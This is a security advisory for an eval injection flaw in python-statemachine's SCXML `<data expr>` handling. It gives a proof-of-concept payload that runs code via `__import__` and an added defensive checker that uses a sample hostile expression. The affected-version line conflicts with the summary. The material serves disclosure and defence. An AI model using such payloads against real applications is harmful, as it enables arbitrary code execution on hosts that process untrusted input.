GHSA-v4jc-pm6r-3vj8
python-statemachine SCXML <data expr> Eval Injection
Details
### Summary
python-statemachine 3.1.2 evaluates `<data expr="...">` attributes in SCXML documents using Python's `eval()`. Any application that passes attacker-controlled SCXML content to `SCXMLProcessor` is vulnerable to arbitrary code execution in the context of the hosting process.
### Details
`SCXMLProcessor.parse_scxml_file()` processes SCXML documents and evaluates `<data>` element `expr` attributes via the following call chain:
```
SCXMLProcessor.parse_scxml_file()
SCXMLProcessor.process_definition()
create_datamodel_action_callable()
_create_dataitem_callable()
_eval()
eval()
```
`_eval()` calls Python's built-in `eval()` directly on the expression string without sandboxing or restriction.
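One defensive pre-check a consuming application can run before handing untrusted SCXML to `SCXMLProcessor`: parse each `<data expr>` with `ast` and reject anything that is not a plain literal. This is an added example, not code from python-statemachine or the advisory; `find_unsafe_data_exprs`, `is_literal_expr` and `safe_data_value` are hypothetical names, and it assumes the application only needs literal initial values in `<data>`.

```python
"""Reject non-literal <data expr> values before they can reach eval()."""
from __future__ import annotations

import ast
import xml.etree.ElementTree as ET

SCXML_NS = "http://www.w3.org/2005/07/scxml"

# Node types that can only produce literal values: no Call, Name, Attribute,
# Subscript or BinOp, so nothing that reaches builtins such as __import__.
_LITERAL_NODES = (ast.Expression, ast.Constant, ast.List, ast.Tuple, ast.Dict,
                  ast.Set, ast.UnaryOp, ast.UAdd, ast.USub, ast.Load)


def is_literal_expr(expr: str) -> bool:
    """True only if expr parses and every AST node is a literal-only node."""
    try:
        tree = ast.parse(expr, mode="eval")
    except SyntaxError:
        return False
    return all(isinstance(node, _LITERAL_NODES) for node in ast.walk(tree))


def find_unsafe_data_exprs(scxml_text: str) -> list[tuple[str, str]]:
    """Return (data id, expr) pairs whose expr would be executed as code."""
    root = ET.fromstring(scxml_text)
    findings = []
    for elem in root.iter():  # match <data> with or without the SCXML namespace
        if elem.tag not in ("data", f"{{{SCXML_NS}}}data"):
            continue
        expr = elem.get("expr")
        if expr is not None and not is_literal_expr(expr):
            findings.append((elem.get("id", "?"), expr))
    return findings


def safe_data_value(expr: str):
    """Evaluate a validated literal expr without eval(); raise otherwise."""
    if not is_literal_expr(expr):
        raise ValueError(f"non-literal <data expr> rejected: {expr!r}")
    return ast.literal_eval(expr)


# Constructed sample document: one benign expr and one that calls into builtins.
SAMPLE_SCXML = """<scxml xmlns="http://www.w3.org/2005/07/scxml" version="1.0" initial="s0">
  <datamodel>
    <data id="retries" expr="[1, 2, 3]"/>
    <data id="x" expr="__import__('os').getpid()"/>
  </datamodel>
  <state id="s0"/>
</scxml>"""

if __name__ == "__main__":
    for data_id, expr in find_unsafe_data_exprs(SAMPLE_SCXML):
        print(f"reject <data id={data_id!r}>: {expr}")
```

Running the check on the sample flags only the `x` entry; the upgrade to 3.2.0 remains the actual fix, this only limits exposure where untrusted documents cannot be avoided.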
### PoC
```
1. Install: pip install python-statemachine==3.1.2
2. Create an SCXML file containing:
   <data id="x" expr="__import__('pathlib').Path('marker.txt').write_text('pwned')"/>
3. Run:
   SCXMLProcessor.parse_scxml_file(DATA_EXPR_CHART)
   SCXMLProcessor.start()
4. During start(), <data expr> reaches _eval(), which calls eval().
5. Result:
   data_marker_before_start: False
   data_marker_after_start: True
   success: True
```
### Impact
This is an eval injection vulnerability (CWE-95). It yields remote or local code execution, depending on whether the consuming application accepts SCXML content from remote users, uploaded files, configuration, plugins, or other untrusted sources.
Affected package
Affected version: 3.0.0. Fixed version: 3.2.0.
pip install --upgrade 'python-statemachine>=3.2.0'
References
- https://github.com/fgmacedo/python-statemachine/security/advisories/GHSA-v4jc-pm6r-3vj8 [WEB]
- https://nvd.nist.gov/vuln/detail/CVE-2026-47103 [ADVISORY]
- https://github.com/fgmacedo/python-statemachine [PACKAGE]
- https://github.com/fgmacedo/python-statemachine/releases/tag/v3.2.0 [WEB]
- https://www.vulncheck.com/advisories/python-statemachine-rce-via-scxml-eval-injection [WEB]